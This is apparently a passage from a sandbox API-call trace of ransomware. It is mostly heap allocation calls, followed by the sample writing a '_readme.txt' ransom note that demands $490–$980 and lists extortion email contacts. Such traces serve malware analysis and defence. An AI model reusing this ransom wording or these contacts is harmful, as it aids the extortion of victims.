[0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.949] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.949] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.949] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.949] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.949] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.949] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.955] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.955] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.955] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.955] PathFindFileNameW (pszPath="") returned="" [0165.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.955] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.956] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.956] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.956] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19640 [0165.956] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.956] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0165.956] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.956] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted 